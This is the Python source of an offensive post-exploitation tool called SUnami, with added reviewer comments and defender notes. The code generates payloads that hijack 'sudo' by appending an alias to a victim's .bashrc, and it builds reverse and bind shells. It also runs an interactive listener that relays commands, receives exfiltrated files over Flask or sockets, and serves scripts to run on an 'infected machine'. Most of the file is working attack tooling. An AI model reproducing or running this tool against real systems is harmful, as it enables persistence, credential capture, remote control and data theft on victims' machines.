sunami.py
# Imports -------------------------------------------------
import lib.payloads as payloads
import lib.parsing as parsing
import lib.banner
import socket
import os
import sys
import time
# Show the program banner, then parse the command line ----
print(lib.banner.subanner)
args = parsing.parser()
# NOTE(review): these two module-level strings are not read anywhere in this
# file as shown; display() and localexec() assign their own locals instead.
result = escapedres = ""
# Functions ---------------------------------------------------------------------------
def routeres(comm, local):
    """Hand a generated command string to the local installer or the printer.

    Args:
        comm: command string to embed in the ``sudo`` alias.
        local: truthy -> localexec() appends the alias to the current user's
            ``~/.bashrc``; falsy -> display() only prints instructions.
    """
    handler = localexec if local else display
    handler(comm)
def display(comm):
    """Print the ``sudo`` alias line and an ``echo`` one-liner that appends it.

    Nothing is written to disk here; the function only prints two blocks of
    text to stdout.

    Defender note: the artefact this produces is an ``alias sudo=`` line in a
    user's ``.bashrc``, so shell start-up files are worth covering with
    file-integrity monitoring and reviewing for unexpected aliases.

    Args:
        comm: command string placed between ``sudo `` and `` sudo`` in the alias.
    """
    alias_line = f'alias sudo="sudo {comm} sudo";'
    # Backslash-escape the double quotes so the line survives inside echo "...".
    quoted_alias = alias_line.replace('"', '\\"')
    paste_hint = f"paste the following into the infected sudoers .bashrc file:\n\t{alias_line}"
    run_hint = f"or run the following command:\n\techo \"{quoted_alias}\" >> $HOME/.bashrc\n"
    print(paste_hint, run_hint, sep="\n")
def localexec(comm):
    """Append the ``sudo`` alias line to ``$HOME/.bashrc`` of the running user.

    The file is opened in append mode, so existing content is kept and the
    alias becomes the last line. Raises ``KeyError`` if ``HOME`` is unset.

    Defender note: an appended ``alias sudo=`` line at the end of ``.bashrc``
    is the on-disk indicator of this step.

    Args:
        comm: command string placed between ``sudo `` and `` sudo`` in the alias.
    """
    print("works")  # leftover debug output from the original
    alias_line = f'alias sudo="sudo {comm} sudo";'
    rc_path = os.environ["HOME"] + "/.bashrc"
    with open(rc_path, "a") as rc_file:
        rc_file.write("\n" + alias_line)
def genshell(ip, port, protocol, shelltype, shell):
    """Look up the generator for ``shell`` and return the command it builds.

    ``shelltype == "bind"`` selects ``payloads.func_dict2``; any other value
    selects ``payloads.func_dict``. An unknown ``shell`` key raises
    ``KeyError``.

    Args:
        ip, port, protocol: passed through unchanged to the generator.
        shelltype: "bind" or anything else (treated as the non-bind table).
        shell: key into the selected table.

    Returns:
        Whatever the selected generator returns (presumably a command
        string; confirm in lib/payloads).
    """
    generators = payloads.func_dict2 if shelltype == "bind" else payloads.func_dict
    return generators[shell](ip, port, protocol)
# IF statements that allow the user to perform multiple actions ---------------------------------------------
# "genshell" sub-command: build the alias payload, then optionally listen.
# NOTE(review): this listing lost its leading whitespace; the nesting below is
# reconstructed from syntax (the elif/else are attached to `if args.listen`)
# and should be confirmed against the upstream file.
if args.command == "genshell":
    cmd=""
    comm=genshell(args.ip, args.port, args.protocol, args.shelltype, args.shell)
    routeres(comm,args.local)
    if args.listen:
        # Single-connection TCP listener bound to args.ip:args.port.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.bind((args.ip, int(args.port)))
            s.listen(1)
            conn, addr = s.accept()
            with conn:
                # NOTE(review): no exit condition; recv() returning b"" after
                # the peer closes is not checked for.
                while True:
                    # Up to 1024 bytes per read; decode() raises
                    # UnicodeDecodeError on bytes that are not valid UTF-8.
                    data = conn.recv(1024).decode("utf-8")
                    # Peer-supplied text goes to the terminal unfiltered,
                    # terminal control sequences included.
                    sys.stdout.write(data)
                    cmd=input()
                    cmd+="\n"
                    conn.send(cmd.encode("utf-8"))
                    time.sleep(1)
                    # "\033[A" moves the cursor up one line, then the last line
                    # of the previously received chunk is re-printed.
                    sys.stdout.write("\033[A" + data.split("\n")[-1])
    elif args.shelltype == "bind":
        # No built-in listener requested: print the matching nc invocation.
        print(f"on your machine run the following:\n\tnc {args.ip} {args.port}")
    else:
        print(f"on your machine run the following:\n\tnc -lnvp {args.port}")
# "exfilfile" sub-command: emit the sender payload and start a receiver.
# NOTE(review): this listing lost its leading whitespace; the nesting below
# (placement of `return ""` and of `break`) is reconstructed from syntax and
# should be confirmed against the upstream file.
if args.command == "exfilfile":
    if args.method == "postflask":
        comm=payloads.Exfil.pflask(args.ip, args.port, args.file)
        routeres(comm, args.local)
        # Flask is imported only when this method is chosen.
        from flask import Flask, request
        app = Flask(__name__)
        # POST /up: prints the raw bytes of the multipart field named "file".
        # The route has no authentication and nothing is saved to disk.
        @app.route("/up",methods=["POST"])
        def upl():
            if request.files["file"]:
                print(request.files["file"].read())
            return ""
        if __name__ == "__main__":
            # Flask's built-in server, bound to the operator-supplied address.
            app.run(host=args.ip, port=int(args.port))
    else:
        # Every method other than "postflask" uses the socket-based payload.
        comm=payloads.Exfil.socket(args.ip, args.port, args.file)
        routeres(comm,args.local)
        if args.method == "pysocket":
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.bind((args.ip, int(args.port)))
                s.listen()
                conn, addr = s.accept()
                with conn:
                    # Prints the first non-empty chunk (at most 1024 bytes, as
                    # a bytes repr) and stops; later data is not read.
                    while True:
                        data = conn.recv(1024)
                        if data:
                            print(data)
                            break
        if args.method == "nc":
            print(f"on your machine run the following:\n\tnc -lnvp {args.port}")
# "rfs" sub-command: emit the fetch payload and serve a templated script.
# NOTE(review): this listing lost its leading whitespace; the nesting below is
# reconstructed from syntax and should be confirmed against the upstream file.
if args.command == "rfs":
    comm=payloads.RFS.run(args.ip, args.port, args.schema)
    routeres(comm,args.local)
    # Flask is imported only when this sub-command is chosen.
    from flask import Flask, request, render_template
    app = Flask(__name__)
    # GET /rfs: renders the template "rfs/<args.file>" with the --vars values.
    @app.route("/rfs",methods=["GET"])
    def rfs(rfvs=args.vars):
        if rfvs:
            # Each entry is split on its first ":" into key and value; an entry
            # without ":" raises IndexError.
            rfsvars={v.split(":",1)[0]:v.split(":",1)[1] for v in rfvs}
        else:
            # Note the type change: an empty string, not an empty dict.
            rfsvars=""
        return render_template(os.path.join("rfs",args.file),rfsvars=rfsvars)
    # POST /l: prints every submitted form field as "key:value" to stdout.
    @app.route("/l",methods=["POST"])
    def listen():
        for key in request.form.keys():
            print(f"{key}:{request.form[key]}")
        return ""
    if __name__ == "__main__":
        # Flask's built-in server, bound to the operator-supplied address.
        app.run(host=args.ip, port=int(args.port))
# Help menu -------------------------------------------------------
# "help" sub-command: print the static usage text below verbatim.
# NOTE(review): any leading whitespace inside this literal was lost when the
# page was extracted; the text is reproduced exactly as shown.
if args.command == "help":
    print("""
SUnami
help outputs this page
genshell generates the shell to be edited in the bashrc file as an alias
--ip ip to connect to
--port port to connect to
--shelltype type of shell to use (reverse, bind) - default is reverse
--shell type of shell to generate - default is bash
reverse bash, nc, nce
bind nc
-protocol type of protocol, will not affect most shells (tcp, udp) - default is tcp
-listen will automatically run a listener after outputting the shell
usage: sunami.py genshell [-h] [--ip IP] [--port PORT] [--shelltype SHELLTYPE] [--shell SHELL] [-protocol PROTOCOL] [-listen]
exfilfile exfiltrates files using several methods
--file file to exfiltrate
--method method to use (postflask, nc, pysocket)
--ip ip to send to
--port port to send to
usage: sunami.py exfilfile [-h] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT]
rfs runs flask server serving your sh files to run from the attacker machine
--ip ip to run server on
--port port to run server on
--file file to run on infected machine
--vars <key>:<value> - sets variables in the selected script using jinja2 template syntax - default is no variables
--schema schema to use (http, https) - default http
useage: sunami.py rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA]
""")